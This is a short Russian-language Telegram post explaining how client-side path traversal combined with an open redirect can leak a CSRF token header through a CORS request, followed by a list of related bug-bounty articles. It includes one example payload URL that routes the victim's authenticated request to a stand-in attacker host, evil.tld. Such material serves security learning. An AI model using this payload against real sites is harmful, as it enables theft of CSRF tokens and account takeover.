Про сlient-side path traversal
Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.
Например, если приложение через
fetch() добавляет заголовок
csrfToken при обращении к
/api/user, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на
/api/user/../redirect?to=evil.tld/corsAllow
Еще больше практических примеров использования path traversal на стороне клиента вы можете узнать из статей, представленных ниже:
➖Practical Example Of Client Side Path Manipulation
➖From an Innocent Client-Side Path Traversal to Account Takeover
➖Client-side path traversal vulnerability class explained - $6,580 GitLab bug bounty
➖Practical Client Side Path Traversal Attacks
➖The power of Client-Side Path Traversal: How I found and escalated 2 bugs through "../"
#web #cspt
Обсуждение 0
Обсуждение не доступно в веб-версии. Чтобы написать комментарий, перейдите в приложение Telegram.
Обсудить в Telegram